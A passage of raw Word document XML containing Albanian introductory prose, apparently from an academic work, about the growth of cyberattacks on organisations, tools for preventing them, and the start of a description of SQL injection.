          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vete. Organizatat n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gjith</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bot</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n marrin sulme kibernetike </w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do dit</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Sidomos organizatat t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cilat mbajn</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na delikate dhe me interes p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rfitime t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tjera. Informacioni </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="009B3BE8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“mjet” me r</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>si t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lart</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, q</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shum</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> njer</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>z d</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shitojn</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta ken</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, arsye kjo p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> qen</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cak</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> i sulmeve kibernetike. Andaj </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> punuar</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mjaft</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shum</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dhe po vazhdon t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00CB41F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> punohet </w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mbotjejn ndaj k</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00382E55">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tyre sulmeve</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, pasi q</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> numri i tyre vazhdimisht </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> duke u rritur. Por nj</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>koh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sisht me rritje t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulmeve n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bot</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n e tekonologjis</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> jan</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> zhvilluar shum</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vegla si dhe softuer t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ndrysh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r parandalim i tyre. Secili prej tyre mund t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rdoret p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gjetur dob</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sit</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aplikacioneve t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ndryshme. Nj</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ri prej lloj</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eve t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00A1225C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulmeve </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injektimi SQL, p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rmes s</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
